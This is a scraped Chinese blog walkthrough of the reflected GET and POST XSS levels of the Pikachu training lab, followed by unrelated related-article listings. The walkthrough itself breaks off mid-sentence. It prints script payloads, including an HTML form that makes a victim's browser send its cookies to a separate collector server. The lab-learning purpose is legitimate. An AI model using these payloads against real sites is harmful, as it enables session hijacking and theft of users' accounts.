Makerdd
Makerdd

Pikachu靶场XSS思路

反射型xss(get)

这个在前端对输入的字符串的长度做了限制,前端的限制都是唬人的,改掉就可以了,然后输入测试字符串

'"<>?&

在源码里定位一下,然后观察到url,

<p class='notice'>who is '"<>&?,i don't care!</p>
http://127.0.0.1:8000/vul/xss/xss_reflected_get.php?message=%27%22%3C%3E%26%3F&submit=submit

通过抓包可以知道并没有与后台发生交互,说明是反射型;通过url可以看出是get型。构造payload,

<script>alert(1)</script>

我们就可以把构造的url发给别人,达到xss攻击的效果。

反射型xss(post)

这个题目按照网上的做法我没有成功,因为浏览器会在单引号前加上转义字符,造成js脚本无法执行。

<script>alert(\'1\')<script>

比如我想弹一个字符’1’,但浏览器会在前后加上转义符,造成脚本并没有执行,最终的解决方案是使用标签,后面会细说。
首先这是一道post请求的xss攻击,get请求我们可以把攻击脚本嵌入到url里,达到攻击效果,post请求url里并没有链接,如何才能达到攻击效果。
我们可以自己搭建一个可以post请求的页面,作者已经给我们写好了这个页面,注意修改请求的ip地址。

<form method="post" action="http://192.168.1.4/pikachu/vul/xss/xsspost/xss_reflected_post.php">
    <input id="xssr_in" type="text" name="message" value=
    "<script>
document.location = 'http://192.168.1.15/pkxss/xcookie/cookie.php?cookie=' + document.cookie;
	</script>"
	 />
    <input id="postsubmit" type="submit" name="submit" value="submit" />
</form>

首先这个post页面中有一个表单,值是下面这一串

 ""

发送给下面这个链接

http://192.168.1.4/pikachu/vul/xss/xsspost/xss_reflected_post.php

也就是有xss漏洞的那个页面,当浏览器发生跳转后,从(post.html到xss_reflected_post.php),会执行script标签里的脚本,这个脚本是请求

http://192.168.1.15/pkxss/xcookie/cookie.php

上面这个页面,带有参数,参数是从带有xss漏洞的页面上取到的cookie,后台收集cookie的页面会继续重定向到首页,像是什么也没有发生一样。
思路大致就是这样,不过我在post页面上稍做了修改。

<form method="post" action="http://192.168.1.4/pikachu/vul/xss/xsspost/xss_reflected_post.php">
    <input id="xssr_in" type="text" name="message" value=
    "<svg><script>
document.location = &#38;#39;http://192.168.1.33/pkxss/xcookie/cookie.php?cookie=&#38;#39; + document.cookie;
	</script>"
	 />
    <input id="postsubmit" type="submit" name="submit" value="submit" />
</form>

首先在

你可能感兴趣的:(XSS攻击)

  • 内外网数据安全摆渡与FTP传输的对比
    一、FTP的困境:为何成为企业数字化转型的绊脚石?FTP(文件传输协议)曾是企业文件传输的“标配”,但在内外网隔离场景下,其局限性日益凸显,甚至成为业务发展的潜在威胁:安全裸奔:数据在“透明通道”中流动明文传输:账号密码、文件内容均以明文形式暴露,黑客可轻松截获;无病毒防御:恶意文件长驱直入,内网核心系统沦为攻击目标;权限失控:粗放的账号管理,离职员工仍可能通过FTP窃取数据。效率黑洞:业务协作卡
  • 聚焦基础研究突破,北电数智联合复旦大学等团队提出“AI安全”DDPA方法入选ICML CSDN资讯 人工智能安全数据要素大数据
    近日,由北电数智首席科学家窦德景教授牵头,联合复旦大学和美国奥本大学等科研团队共同研发,提出一种DDPA(DynamicDelayedPoisoningAttack)新型对抗性攻击方法,为机器学习领域的安全研究提供新视角与工具,相关论文已被国际机器学习大会(ICML2025)收录。ICML由国际机器学习学会(IMLS)主办,聚焦深度学习、强化学习、自然语言处理等机器学习前沿方向,是机器学习与人工智
  • 阿里云态势感知和安骑士有什么区别? 阿腾云
    阿里云态势感知和安骑士均是阿里云云盾安全产品,态势感知属于安全管理类的产品,安骑士数据服务器安全类产品,阿里云百科网来详细说下阿里云态势感知和安骑士之间的区别:态势感知和安骑士的区别简单来说,安骑士是检测云服务器漏洞的,态势感知提供安全类的大数据分析服务。态势感知:安全大数据分析平台,通过机器学习和结合全网威胁情报,发现传统防御软件无法覆盖的网络威胁,溯源攻击手段、并且提供可行动的解决方案。安骑士
  • 单眼皮对决双眼皮 天空有云
    如果未来人体某些“配件”可以定制,可以预先设计,比如在小娃娃出生前,通过某种技术手段给弄一头且陪伴长久浓密的、头乌黑的亮发,或者栗色的,总支自己喜欢的某种颜色,省的以后经常进理发店花钱找人染。当然这只是一个设想,要知道基因编辑技术已经具有可怕的力量,是天使、是恶魔,真的不知道。如果未来人类遭遇某种危机,病毒攻击我们的基因,是活下去还是选择基因编辑呢?这个真是个烧脑的话题。聊个轻松地。如果双眼皮、单
  • 奥特曼卡片 你好陌生人
    我有一张非常稀有的奥特曼卡片,是我最喜欢的一张卡片它是一张欧布奥特曼它的存在叫做煌闪形态我还有很多张它的形态,煌闪形态他非常的厉害,他的攻击力,有15500,他的防御力有156000,他可以去宇宙生活城市生活,森林生活,海洋生活,这张卡片是一张CP的,是一张满星的,他的必杀技是银河艾克斯闪耀,他是我最喜欢的一张卡片。
  • Spring Cloud Gateway远程代码执行CVE-2022-22947漏洞分析及复现 长白山攻防实验室
    0x01漏洞描述SpringCloudGateway是基于SpringFramework和SpringBoot构建的API网关,它旨在为微服务架构提供一种简单、有效、统一的API路由管理方式。据公布的漏洞描述称,当SpringCloudGateway执行器端点启用、公开且不安全时,使用SpringCloudGateway的应用程序容易受到代码注入攻击。远程攻击者可以发出含有恶意代码的请求,从而允许
  • 云原生安全工具:数字基础设施的免疫长城 花海如潮淹 云原生安全经验分享笔记
    ⚡运维团队的三重核灾难1.容器漏洞的连锁爆炸某金融平台因基础镜像包含未修复的Log4j漏洞,黑客横向穿透182个Pod,导致2.3亿用户数据泄露(CNCF2024安全报告)。更致命的是,53%的漏洞存在于第三方镜像(Sysdig研究),传统扫描器漏检率超35%。2.微服务边界的信任崩塌某电商因未限制服务账户权限,攻击者通过促销API入侵支付系统,45分钟盗取$4300万(FBI加密犯罪档案)。Ku
  • 《不要把不好的结果归咎于任何人,从自己身上找原因》读后感 野生俊
    人的生存本能就是在遇到让自己感到危险或难受的时候,对外界或他人进行攻击,以期达到自我保护的目的。遇到不好的结果,把责任甩锅给他人,以为自己就会好受一点,然而,根本解决不了实质性问题。很多时候,在工作中,有的管理者或下层员工,以为在面对错误的时候,必须学会推卸责任,认为只有这样才能让自己在职场可以自保或发展。把责任推卸给他人,是因为自我标准在给自己设限。例如:一个小女孩,连续几天醒来都在擦拭自己卧室
  • 防护ddos无从下手?了解ddos原理轻松应对危机 Hik__c484
    近几年,大规模的DDoS攻击事件在全球范围内发生了很多次,再次造成了轰动,如何防护DDoS由此也引起了大众的重点关注。虽然很多互联网企业都建立了一定的本地DDoS防御措施及运营商级的DDoS监测清洗服务,但是物联网飞速发展,而且进行攻击的成本越来越低,衍生的新型攻击手段层出不穷,DDoS攻击逐渐形成了产业链,许多互联网企业都为此头痛不已。防护ddos无从下手?了解ddos原理轻松应对危机那么想要采
  • 第六章:战况逆转 万千风格L
    那是?唐秋雨……轩灵寒拿着轩辕剑朝爵星落刺去时看见了一张十分熟悉的脸颊再度浮现在自己的面前,不过他却不明白那曾经只对他一个表现出热情一面的女孩已经远离了这个世界,他们的命运,已经交错成了两条线。“秋雨,你怎么会在这儿,你还活着……”轩灵寒止住了当下的攻击,眼神呆滞地瞅着唐秋雨,原来她还真的活着,太好了,太好了,轩灵寒内心止不住的欢喜,而唐秋雨身旁的爵星落却在一旁疯狂地笑着,似乎是在嘲笑轩灵寒此刻的
  • 【Java代码审计 | 第五篇】XSS漏洞成因+实战案例 秋说 Java代码审计javaxss
    未经许可,不得转载。文章目录XSS漏洞成因1、直接输出用户输入2、在JSP中使用EL表达式输出用户输入3、在Thymeleaf模板中输出用户输入4、在JavaScript中嵌入用户输入实战案例案例1案例2案例3XSSXSS(跨站脚本攻击,Cross-SiteScripting)是一种常见的Web安全漏洞,攻击者通过在网页中注入恶意脚本,使得这些脚本在用户的浏览器中执行。XSS攻击通常分为以下三种类
  • 基于 vue+Cesium 实现军事标绘之钳击箭头绘制实战
    效果图在地理信息系统(GIS)开发中,军事标绘是一个重要的应用场景,其中箭头类标绘(如攻击箭头、钳击箭头)是常用的战术符号。本文将基于Cesium引擎,详细讲解如何实现可交互的钳击箭头绘制功能,支持动态跟随鼠标调整、固定部分标绘区域及自动清理临时标记等特性。一、技术背景与实现目标Cesium简介Cesium是一款开源的3D地理信息引擎,支持高精度全球地形、影像加载及矢量数据可视化,广泛应用于数字地
  • 漏洞扫描 + 渗透测试:双轮驱动筑牢网络安全防线 白山云北诗 网络安全行业知识web安全网络安全渗透测试漏洞扫描安全检测
    在网络安全领域,单一的防护手段往往难以应对复杂的威胁环境。漏洞扫描通过自动化工具快速发现潜在风险,渗透测试则以攻击者视角验证漏洞的实际危害,二者结合形成“自动化检测+人工验证”的双轮驱动模式,已成为企业筑牢安全防线的核心策略。一、漏洞扫描与渗透测试的协同价值漏洞扫描和渗透测试并非相互替代,而是互补的安全检测手段:漏洞扫描:自动化发现潜在风险漏洞扫描工具通过预设规则和特征库,对网络设备、服务器、应用
  • 都市短篇文《重生后,打脸渣男贱女》张晚苏蔓蔓(言情小说)全集免费阅读 兔子爱阅读
    都市短篇文《重生后,打脸渣男贱女》张晚苏蔓蔓(言情小说)全集免费阅读主角:张晚苏蔓蔓简介:彻底摆烂后,我决定休学旅游。我退出了全国绘画比赛,有人却比我更急。男友的白月光拼命联系我,想让我重新拿起画笔。此刻的我早已在千里之外赶海浮潜,玩得不亦乐乎。上一世,我苦心创作出来的作品却被人举报抄袭。大量的证据公布出来,网上直接骂疯。解释无效,网暴升级为人身攻击,极端网友往我家丢燃烧酒瓶。父母在火灾中丧命,我
  • 【Web安全】逻辑漏洞之支付漏洞:原理、场景与防御 介一笔记 #Web安全基础web安全安全支付漏洞逻辑漏洞安全性测试安全威胁分析
    文章目录前言一、漏洞本质二、攻击原理正常支付流程漏洞触发流程三、抓包的时机选择:生成订单时四、风险场景1.隐藏商品购买(开发人员预留的测试商品)2.付费功能免费使用(添加付费参数:JS中查询、先买个会员抓包查看)3.修改订单类型(0改成-1、1、2、3)4.修改通用参数(自动计算最终折扣)五、检测方式1.黑盒测试:模拟攻击流程2.白盒审计:代码层校验逻辑排查六、防御方案1.严格校验关键参数2.订单
  • 防止应用调试分析IP被扫描加固实战教程 咕噜企业签名分发-大圣 tcp/ip网络协议网络
    防止应用调试分析IP被扫描加固实战教程主要包括以下几个方面的措施:一、应用层面的加固措施1.确保通信加密:使用HTTPS协议进行所有网络通信,加密传输的数据,防止中间人攻击(MITM)。在Android应用中,可以通过NetworkSecurityConfiguration强制使用HTTPS。创建network_security_config.xml文件,并在AndroidManifest.xml
  • 智能合约安全 - 重入攻击 - 常见漏洞(第一篇) 麻辣兔变形记 区块链
    重入攻击简单来说:在合约状态还没发生改变前,不停的进行对合约进行套利操作。存在场景:1、单函数重入(Single-FunctionReentrancy)简单来说:在一个函数中进行多次获取钱财操作。一般发生在先给他人转账,再进行修改状态。流程•攻击路径:Victim.funcA→Attacker.receive/fallback→Victim.funcA→…•经典案例:TheDAO(2016)。•关
  • 【安全等保】华为安全等保二、三级方案精讲【附全文阅读】 智慧化智能化数字化方案 服务器网络数据库华为安全等保安全等级保护二级安全等保方案三级安全等保方案
    华为安全等保二、三级方案围绕网络安全等级保护制度,构建“一个中心三重防护”体系(安全管理中心、安全通信网络、安全区域边界、安全计算环境)。方案覆盖定级、备案、整改、测评、监督全流程,针对二、三级保护对象提供差异化产品组合(如二级基础版含NGFW、主机杀毒、日志审计;三级增强版增配IPS、APT沙箱等),强调合规要求与技术防护结合,应对网络攻击、数据泄露等风险,保障信息系统安全。详细总结一、等保制度
  • 2022-01-19 每天都微笑
    20220119练习:不断练习增强“和解力”。摘抄:可以发生冲突,也可以和解,这是一个人人格健康的重要标志。要想拥有这样的健康人格,首先得有一种信念:相信自己是结实的,不会因为对方表达了攻击性而破碎,不会因为害怕被攻击而让自己压抑或强忍;相信他人也是结实的,虽然我们表达了攻击性,他们可能会难受,但是不至于陷入无休止的抑郁和痛苦中。也就是说,我们敢于在关系中表达自己真实的感受和需要,表达自己的攻击性
  • 2022-02-28 一个人的日记0
    今日跑步5公里感谢董老师分享语言伤害指数5行动指数0做一个最勤奋情绪稳定脚踏实地极致做事的人多赞美多鼓励多表扬不批评不抱怨不指责不确定不要求不对比不急躁不人生攻击日计划执行做总结25分钟分割时间今天我最伟大明天我最好看拜师全身心的信任目标不可能失败计划不要脸学会展示干就完了从善思考
  • Web安全之CSP weixin_30649641 web安全开发工具网络
    内容安全策略(Content-Security-Policy,简称CSP)概念:内容安全策略(CSP)是一种web应用技术用于帮助缓解大部分类型的内容注入攻击,包括XSS攻击和数据注入等,这些攻击可实现数据窃取、网站破坏和作为恶意软件分发版本等行为。该策略可让网站管理员指定客户端允许加载的各类可信任资源。浏览器支持:统计来源:caniuse.com/contentsecuritypolicy&Mo
  • 2025 年终端安全管理系统推荐,最强桌面管理软件分享 Synfuture阳途 安全网络web安全
    在数字化时代,企业终端设备面临网络攻击等多重风险,能够有效监控、管理和保护终端设备。以下为你推荐几款2025年值得关注的终端安全管理系统。阳途终端安全管理系统这是国内终端安全领域的标杆产品,凭借全场景防护能力和精细化管控,成为金融、政府、制造等行业企业的首选。上网行为审计与管控:系统可以详细记录员工邮件收发等行为,一旦发现异常行为会立即预警。数据防泄密:采用透明加密技术,即使文件外发也无法打开,彻
  • 工具链漏洞预警:全球活跃利用中的SharePoint新型零日RCE攻击链 FreeBuf- sharepoint
    图片来源:CODEWHITEGmbH2025年7月18日晚间,EyeSecurity安全团队发现一起大规模利用新型MicrosoftSharePoint远程代码执行(RCE)漏洞链的攻击活动,该漏洞链被命名为ToolShell。攻击者通过组合利用CVE-2025-49704和CVE-2025-49706两个漏洞,可在无需认证的情况下完全控制本地部署的SharePoint服务器。"这并非凭证泄露问题
  • 渗透测试视角:Web 应用常见漏洞的利用与防御策略
    Web应用已成为企业业务的核心载体,但SQL注入、XSS、文件上传漏洞等安全问题频发。从渗透测试视角分析漏洞的利用原理,才能制定更有效的防御策略。本文将结合实战案例,解析Web应用常见漏洞的利用方式与防御方法。一、SQL注入漏洞:数据库的“隐形后门”SQL注入是最常见的Web漏洞之一,攻击者通过在参数中插入SQL语句,操控数据库获取数据或执行命令。漏洞原理与利用场景当Web应用未对用户输入进行过滤
  • 筑牢网络安全防线:DDoS/CC 攻击全链路防护技术解析 白山云北诗 网络安全行业知识web安全ddos安全高防cdncc防护
    当服务器带宽突然飙升至满负荷,业务系统瞬间瘫痪;当应用服务器CPU占用率持续99%,legitimate用户无法正常访问——这些场景背后,往往是DDoS或CC攻击的冲击。据2024年全球网络安全报告显示,DDoS攻击平均持续时间达4.5小时,单次攻击给企业造成的直接损失超80万元,而CC攻击因隐蔽性强,识别难度更高,已成为应用层威胁的主要来源。构建全链路防护体系,是企业抵御这类攻击的核心保障。一、
  • 渗透攻击红队百科全书 绝不原创的飞龙 渗透
    据说原始扫描件有病毒,我就解析Xref提取图片然后重新生成了一份。我也拿不到纸质书,根据网上流传的版本加工了一下,不清楚是肯定的。其他的不说了,懂的都懂。目录第一章信息搜集1.1主机发现1.2关联信息生成1.3开放漏洞情报1.4开源情报信息搜集(OSINT)1.5GithubHacking1.6GoogleHacking1.7Gitlcret1.8Mailsniper.psl获取Outlook所有
  • 竞足003德甲:RB莱比锡VS斯图加特 足彩喜报
    莱比锡是德甲联赛传统豪门,上赛季德甲联赛取得34胜19平7负积65分,排行第2。新赛季莱比锡在联赛客场0:1输给美因茨,最近球队状态低迷。莱比锡全队身价(5.6亿欧元),高于斯图加身价(1.6亿欧元)。莱比锡与斯图加的近6场比赛取得5胜1平0负的成绩,交锋占据优势。斯图加特上赛季在德甲联赛取得12胜9平13负积分45分,排名第9。新赛季球队正式比赛开局取得2场全胜并且打入11球失球1球,球队攻击力
  • 35副房树人 知心妈妈春平
    画作主题:世外桃园画者基本信息:性别:女年龄:34职业:家庭主妇家庭情况:老公,儿子,女儿其他背景信息:画者困惑:不知道怎么样才能教好孩子整体印象1、印象关键词:2、绘画时间:40分钟(时间过长,画者纠结,犹豫,追求完美,慢性子)3、绘画顺序:房子,小溪,树,太阳,人4、涂抹和擦拭:一、总:全局着眼1、画面大小:充满画面,画者心理能量充足、自信,可能自我中心、自负,不排除具有攻击性、情绪化、躁动2
  • 《开创新品类》第七章第9节:差异化战略方案构成与优势 a57051ee1ea8
    战略方案的制定其实有四个方面构成:1、战略,方向及布局;步骤:规划→制定→实施;方式:多元化战略→企业战略→品牌战略→差异化战略→技术战略→人才战略→竞争战略→职能战略→融资战略→资源战略;2、策略,组织成员进行战斗;方式:不战而胜→先发制人→集中攻击→力量而行→避实就虚→借鸡生蛋→狡兔三窟→暗渡陈仓→围魏救赵→背水一战→釜底抽薪;3、战术,指对指导进行战斗的方法;步骤:部署→协同→指挥→行动→保
  • 一次XSS漏洞引发的用户信息泄露 —— 在线教育平台真实案例剖析与防御实践
    一、引子:一个“学习感言”输入框引发的安全事故在一次大型在线教育平台的开发中,笔者曾亲身经历过一起严重的安全事故。事故的起点很微不足道:一个允许用户提交“学习感言”的输入框。然而,由于缺乏安全意识和输入输出处理的规范,这个字段成为攻击者入侵的跳板,最终导致大量用户信息泄露、信任危机和平台业务受损。这个案例虽然已过去多年,但其中反映的安全盲点依然广泛存在于当前的互联网项目中,特别是在中小团队、快速上
  • Nginx负载均衡 510888780 nginx应用服务器
    Nginx负载均衡一些基础知识: nginx 的 upstream目前支持 4 种方式的分配 1)、轮询(默认)       每个请求按时间顺序逐一分配到不同的后端服务器,如果后端服务器down掉,能自动剔除。 2)、weight       指定轮询几率,weight和访问比率成正比
  • RedHat 6.4 安装 rabbitmq bylijinnan erlangrabbitmqredhat
    在 linux 下安装软件就是折腾,首先是测试机不能上外网要找运维开通,开通后发现测试机的 yum 不能使用于是又要配置 yum 源,最后安装 rabbitmq 时也尝试了两种方法最后才安装成功 机器版本: [root@redhat1 rabbitmq]# lsb_release LSB Version: :base-4.0-amd64:base-4.0-noarch:core
  • FilenameUtils工具类 eksliang FilenameUtilscommon-io
    转载请出自出处:http://eksliang.iteye.com/blog/2217081 一、概述 这是一个Java操作文件的常用库,是Apache对java的IO包的封装,这里面有两个非常核心的类FilenameUtils跟FileUtils,其中FilenameUtils是对文件名操作的封装;FileUtils是文件封装,开发中对文件的操作,几乎都可以在这个框架里面找到。 非常的好用。
  • xml文件解析SAX 不懂事的小屁孩 xml
    xml文件解析:xml文件解析有四种方式, 1.DOM生成和解析XML文档(SAX是基于事件流的解析) 2.SAX生成和解析XML文档(基于XML文档树结构的解析) 3.DOM4J生成和解析XML文档 4.JDOM生成和解析XML 本文章用第一种方法进行解析,使用android常用的DefaultHandler import org.xml.sax.Attributes;
  • 通过定时任务执行mysql的定期删除和新建分区,此处是按日分区 酷的飞上天空 mysql
    使用python脚本作为命令脚本,linux的定时任务来每天定时执行 #!/usr/bin/python # -*- coding: utf8 -*- import pymysql import datetime import calendar #要分区的表 table_name = 'my_table' #连接数据库的信息 host,user,passwd,db =
  • 如何搭建数据湖架构?听听专家的意见 蓝儿唯美 架构
    Edo Interactive在几年前遇到一个大问题:公司使用交易数据来帮助零售商和餐馆进行个性化促销,但其数据仓库没有足够时间去处理所有的信用卡和借记卡交易数据  “我们要花费27小时来处理每日的数据量,”Edo主管基础设施和信息系统的高级副总裁Tim Garnto说道:“所以在2013年,我们放弃了现有的基于PostgreSQL的关系型数据库系统,使用了Hadoop集群作为公司的数
  • spring学习——控制反转与依赖注入 a-john spring
           控制反转(Inversion of Control,英文缩写为IoC)是一个重要的面向对象编程的法则来削减计算机程序的耦合问题,也是轻量级的Spring框架的核心。 控制反转一般分为两种类型,依赖注入(Dependency Injection,简称DI)和依赖查找(Dependency Lookup)。依赖注入应用比较广泛。  
  • 用spool+unixshell生成文本文件的方法 aijuans xshell
    例如我们把scott.dept表生成文本文件的语句写成dept.sql,内容如下:   set pages 50000;   set lines 200;   set trims on;   set heading off;   spool /oracle_backup/log/test/dept.lst;   select deptno||','||dname||','||loc
  • 1、基础--名词解析(OOA/OOD/OOP) asia007 学习基础知识
    OOA:Object-Oriented Analysis(面向对象分析方法) 是在一个系统的开发过程中进行了系统业务调查以后,按照面向对象的思想来分析问题。OOA与结构化分析有较大的区别。OOA所强调的是在系统调查资料的基础上,针对OO方法所需要的素材进行的归类分析和整理,而不是对管理业务现状和方法的分析。   OOA(面向对象的分析)模型由5个层次(主题层、对象类层、结构层、属性层和服务层)
  • 浅谈java转成json编码格式技术 百合不是茶 json编码java转成json编码
    json编码;是一个轻量级的数据存储和传输的语言       在java中需要引入json相关的包,引包方式在工程的lib下就可以了   JSON与JAVA数据的转换(JSON 即 JavaScript Object Natation,它是一种轻量级的数据交换格式,非   常适合于服务器与 JavaScript 之间的数据的交
  • web.xml之Spring配置(基于Spring+Struts+Ibatis) bijian1013 javaweb.xmlSSIspring配置
    指定Spring配置文件位置 <context-param> <param-name>contextConfigLocation</param-name> <param-value> /WEB-INF/spring-dao-bean.xml,/WEB-INF/spring-resources.xml, /WEB-INF/
  • Installing SonarQube(Fail to download libraries from server) sunjing InstallSonar
    1.  Download and unzip the SonarQube distribution 2.  Starting the Web Server The default port is "9000" and the context path is "/". These values can be changed in &l
  • 【MongoDB学习笔记十一】Mongo副本集基本的增删查 bit1129 mongodb
    一、创建复本集   假设mongod,mongo已经配置在系统路径变量上,启动三个命令行窗口,分别执行如下命令:   mongod --port 27017 --dbpath data1 --replSet rs0 mongod --port 27018 --dbpath data2 --replSet rs0 mongod --port 27019 -
  • Anychart图表系列二之执行Flash和HTML5渲染 白糖_ Flash
    今天介绍Anychart的Flash和HTML5渲染功能   HTML5 Anychart从6.0第一个版本起,已经逐渐开始支持各种图的HTML5渲染效果了,也就是说即使你没有安装Flash插件,只要浏览器支持HTML5,也能看到Anychart的图形(不过这些是需要做一些配置的)。 这里要提醒下大家,Anychart6.0版本对HTML5的支持还不算很成熟,目前还处于
  • Laravel版本更新异常4.2.8-> 4.2.9 Declaration of ... CompilerEngine ... should be compa bozch laravel
    昨天在为了把laravel升级到最新的版本,突然之间就出现了如下错误: ErrorException thrown with message "Declaration of Illuminate\View\Engines\CompilerEngine::handleViewException() should be compatible with Illuminate\View\Eng
  • 编程之美-NIM游戏分析-石头总数为奇数时如何保证先动手者必胜 bylijinnan 编程之美
    import java.util.Arrays; import java.util.Random; public class Nim { /**编程之美 NIM游戏分析 问题: 有N块石头和两个玩家A和B,玩家A先将石头随机分成若干堆,然后按照BABA...的顺序不断轮流取石头, 能将剩下的石头一次取光的玩家获胜,每次取石头时,每个玩家只能从若干堆石头中任选一堆,
  • lunce创建索引及简单查询 chengxuyuancsdn 查询创建索引lunce
    import java.io.File; import java.io.IOException; import org.apache.lucene.analysis.Analyzer; import org.apache.lucene.analysis.standard.StandardAnalyzer; import org.apache.lucene.document.Docume
  • [IT与投资]坚持独立自主的研究核心技术 comsci it
           和别人合作开发某项产品....如果互相之间的技术水平不同,那么这种合作很难进行,一般都会成为强者控制弱者的方法和手段.....        所以弱者,在遇到技术难题的时候,最好不要一开始就去寻求强者的帮助,因为在我们这颗星球上,生物都有一种控制其
  • flashback transaction闪回事务查询 daizj oraclesql闪回事务
       闪回事务查询有别于闪回查询的特点有以下3个: (1)其正常工作不但需要利用撤销数据,还需要事先启用最小补充日志。 (2)返回的结果不是以前的“旧”数据,而是能够将当前数据修改为以前的样子的撤销SQL(Undo SQL)语句。 (3)集中地在名为flashback_transaction_query表上查询,而不是在各个表上通过“as of”或“vers
  • Java I/O之FilenameFilter类列举出指定路径下某个扩展名的文件 游其是你 FilenameFilter
    这是一个FilenameFilter类用法的例子,实现的列举出“c:\\folder“路径下所有以“.jpg”扩展名的文件。 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28
  • C语言学习五函数,函数的前置声明以及如何在软件开发中合理的设计函数来解决实际问题 dcj3sjt126com c
    # include <stdio.h> int f(void) //括号中的void表示该函数不能接受数据,int表示返回的类型为int类型 { return 10; //向主调函数返回10 } void g(void) //函数名前面的void表示该函数没有返回值 { //return 10; //error 与第8行行首的void相矛盾 } in
  • 今天在测试环境使用yum安装,遇到一个问题: Error: Cannot retrieve metalink for repository: epel. Pl dcj3sjt126com centos
    今天在测试环境使用yum安装,遇到一个问题: Error: Cannot retrieve metalink for repository: epel. Please verify its path and try again   处理很简单,修改文件“/etc/yum.repos.d/epel.repo”, 将baseurl的注释取消, mirrorlist注释掉。即可。 &n
  • 单例模式 shuizhaosi888 单例模式
    单例模式      懒汉式 public class RunMain { /** * 私有构造 */ private RunMain() { } /** * 内部类,用于占位,只有 */ private static class SingletonRunMain { priv
  • Spring Security(09)——Filter 234390216 Spring Security
    Filter 目录 1.1     Filter顺序 1.2     添加Filter到FilterChain 1.3     DelegatingFilterProxy 1.4     FilterChainProxy 1.5
  • 公司项目NODEJS实践0.1 逐行分析JS源代码 mongodbnginxubuntunodejs
      一、前言         前端如何独立用nodeJs实现一个简单的注册、登录功能,是不是只用nodejs+sql就可以了?其实是可以实现,但离实际应用还有距离,那要怎么做才是实际可用的。         网上有很多nod
  • java.lang.Math liuhaibo_ljf javaMathlang
    System.out.println(Math.PI); System.out.println(Math.abs(1.2)); System.out.println(Math.abs(1.2)); System.out.println(Math.abs(1)); System.out.println(Math.abs(111111111)); System.out.println(Mat
  • linux下时间同步 nonobaba ntp
    今天在linux下做hbase集群的时候,发现hmaster启动成功了,但是用hbase命令进入shell的时候报了一个错误  PleaseHoldException: Master is initializing,查看了日志,大致意思是说master和slave时间不同步,没办法,只好找一种手动同步一下,后来发现一共部署了10来台机器,手动同步偏差又比较大,所以还是从网上找现成的解决方
  • ZooKeeper3.4.6的集群部署 roadrunners zookeeper集群部署
    ZooKeeper是Apache的一个开源项目,在分布式服务中应用比较广泛。它主要用来解决分布式应用中经常遇到的一些数据管理问题,如:统一命名服务、状态同步、集群管理、配置文件管理、同步锁、队列等。这里主要讲集群中ZooKeeper的部署。   1、准备工作 我们准备3台机器做ZooKeeper集群,分别在3台机器上创建ZooKeeper需要的目录。   数据存储目录
  • Java高效读取大文件 tomcat_oracle java
      读取文件行的标准方式是在内存中读取,Guava 和Apache Commons IO都提供了如下所示快速读取文件行的方法:   Files.readLines(new File(path), Charsets.UTF_8);   FileUtils.readLines(new File(path));   这种方法带来的问题是文件的所有行都被存放在内存中,当文件足够大时很快就会导致
  • 微信支付api返回的xml转换为Map的方法 xu3508620 xmlmap微信api
    举例如下: <xml>    <return_code><![CDATA[SUCCESS]]></return_code>    <return_msg><![CDATA[OK]]></return_msg>    <appid><